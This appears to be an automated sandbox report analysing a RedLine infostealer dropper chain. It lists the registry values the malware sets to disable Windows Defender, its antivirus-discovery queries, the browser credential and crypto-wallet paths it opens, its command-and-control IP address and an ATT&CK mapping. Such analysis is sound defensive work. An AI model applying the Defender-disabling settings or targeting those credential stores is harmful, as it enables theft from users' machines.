                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2575
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00975467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00975467
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00972390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00972390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_001A2390
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00A82390
                          Source: bAS06bx.exe, 00000005.00000003.393709063.0000000000F41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                          Source: bAS06bx.exe, 00000005.00000003.393709063.0000000000F41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareS8SKR55DWin32_VideoControllerVR_9GN8GVideoController120060621000000.000000-00001272173display.infMSBDAD2NSCP_KPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors9VBR253Gq
                          Source: bAS06bx.exe, 00000005.00000002.395026576.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000003.388641612.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00972F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00972F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00976F40 SetUnhandledExceptionFilter,0_2_00976F40
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00976CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00976CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A6F40 SetUnhandledExceptionFilter,1_2_001A6F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_001A6CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A86F40 SetUnhandledExceptionFilter,2_2_00A86F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A86CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00A86CF0

                          HIPS / PFW / Operating System Protection Evasion

                          Source: aRe53.exe.2.dr, Program.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                          Source: bAS06bx.exe.2.dr, MemoryImport.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                          Source: 3.0.aRe53.exe.5e0000.0.unpack, Program.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                          Source: 5.0.bAS06bx.exe.860000.0.unpack, MemoryImport.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009718A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_009718A3
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00977155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00977155
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00972BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00972BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeCode function: 3_2_00007FF815F6077D GetUserNameA,3_2_00007FF815F6077D

                          Lowering of HIPS / PFW / Operating System Security Settings

                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                          Source: bAS06bx.exe, 00000005.00000002.395026576.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000003.393709063.0000000000F50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 2.3.fDI32WO.exe.45dfc20.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.fDI32WO.exe.45dfc20.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.0.bAS06bx.exe.860000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.333078964.0000000000862000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: bAS06bx.exe PID: 1256, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, type: DROPPED
                          Source: Yara matchFile source: 0.3.file.exe.4ce3420.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.file.exe.4ce3420.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.306383472.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                          Remote Access Functionality

                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 2.3.fDI32WO.exe.45dfc20.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.fDI32WO.exe.45dfc20.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.0.bAS06bx.exe.860000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.333078964.0000000000862000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: bAS06bx.exe PID: 1256, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, type: DROPPED
                          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                          Valid Accounts221
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          21
                          Disable or Modify Tools
                          1
                          OS Credential Dumping
                          1
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          Exfiltration Over Other Network Medium2
                          Encrypted Channel
                          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                          System Shutdown/Reboot
                          Default Accounts12
                          Native API
                          1
                          Windows Service
                          2
                          Bypass User Access Control
                          11
                          Obfuscated Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol2
                          Data from Local System
                          Exfiltration Over Bluetooth1
                          Non-Standard Port
                          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain Accounts2
                          Command and Scripting Interpreter
                          Logon Script (Windows)1
                          Access Token Manipulation
                          1
                          Timestomp
                          Security Account Manager1
                          File and Directory Discovery
                          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                          Application Layer Protocol
                          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local Accounts1
                          Service Execution
                          Logon Script (Mac)1
                          Windows Service
                          1
                          DLL Side-Loading
                          NTDS127
                          System Information Discovery
                          Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon Script1
                          Process Injection
                          2
                          Bypass User Access Control
                          LSA Secrets331
                          Security Software Discovery
                          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.common1
                          Masquerading
                          Cached Domain Credentials11
                          Process Discovery
                          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup Items231
                          Virtualization/Sandbox Evasion
                          DCSync231
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                          Access Token Manipulation
                          Proc Filesystem1
                          Application Window Discovery
                          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                          Process Injection
                          /etc/passwd and /etc/shadow1
                          System Owner/User Discovery
                          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                          Rundll32
                          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          [Behavior graph. ID: 803670, Sample: file.exe, Startdate: 10/02/2023, Architecture: WINDOWS, Score: 100. Process chain: file.exe drops dXL24Wx.exe and fuN31PL.exe and starts fuN31PL.exe; fuN31PL.exe drops cfh9400.exe and fDI32WO.exe and starts fDI32WO.exe; fDI32WO.exe drops and starts bAS06bx.exe and aRe53.exe. bAS06bx.exe contacts 193.233.20.11 (REDCOM-AS, Russian Federation); aRe53.exe carries the "Disable Windows Defender notifications (registry)" and "Disable Windows Defender real time protection (registry)" signatures.]

                          Source | Detection | Scanner | Label | Link
                          file.exe | 69% | ReversingLabs | Win32.Trojan.RedLine |
                          file.exe | 59% | Virustotal | | Browse
                          file.exe | 100% | Avira | HEUR/AGEN.1252166 |
                          file.exe | 100% | Joe Sandbox ML | |

                          Source | Detection | Scanner | Label | Link
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe | 100% | Avira | HEUR/AGEN.1252166 |
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | 100% | Avira | HEUR/AGEN.1252166 |
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe | 100% | Avira | HEUR/AGEN.1252166 |
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe | 79% | ReversingLabs | Win32.Spyware.RedLine |
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe | 81% | Virustotal | | Browse
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe | 69% | ReversingLabs | Win32.Trojan.RedLine |
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe | 55% | Virustotal | | Browse
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exe | 33% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exe | 49% | Virustotal | | Browse
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe | 64% | ReversingLabs | Win32.Trojan.RedLine |
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe | 85% | ReversingLabs | ByteCode-MSIL.Trojan.Disabler |
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe | 96% | ReversingLabs | ByteCode-MSIL.Trojan.RedLine |

                          Source | Detection | Scanner | Label | Link | Download
                          0.0.file.exe.970000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
                          1.2.fuN31PL.exe.1a0000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
                          0.2.file.exe.970000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
                          2.2.fDI32WO.exe.a80000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
                          1.3.fuN31PL.exe.47c6820.0.unpack | 100% | Avira | HEUR/AGEN.1253311 | | Download File
                          5.0.bAS06bx.exe.860000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
                          1.0.fuN31PL.exe.1a0000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
                          2.0.fDI32WO.exe.a80000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
                          No Antivirus matches
                          No contacted domains info
                          Name | Malicious | Antivirus Detection | Reputation
                          193.233.20.11:4131 | true | 7%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentitybAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/soap/envelope/bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://search.yahoo.com?fr=crmas_sfpfbAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeybAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/06/addressingexbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoorbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/NoncebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://tempuri.org/Entity/Id17ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
193.233.20.11 | unknown | Russian Federation | 8749 | REDCOM-ASRedcomKhabarovskRussiaRU | true
                                                                                                                                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                            Analysis ID:803670
                                                                                                                                                            Start date and time:2023-02-10 06:57:22 +01:00
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 9m 44s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                            Number of analysed new started processes analysed:13
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Sample file name:file.exe
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@12/8@0/1
                                                                                                                                                            EGA Information:
                                                                                                                                                            • Successful, ratio: 80%
                                                                                                                                                            HDC Information:
                                                                                                                                                            • Successful, ratio: 100% (good quality ratio 95.8%)
                                                                                                                                                            • Quality average: 85.2%
                                                                                                                                                            • Quality standard deviation: 22.7%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            • Number of executed functions: 187
                                                                                                                                                            • Number of non-executed functions: 97
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                            • Override analysis time to 240s for rundll32
                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                                                                            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                                                                            • Execution Graph export aborted for target bAS06bx.exe, PID 1256 because it is empty
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
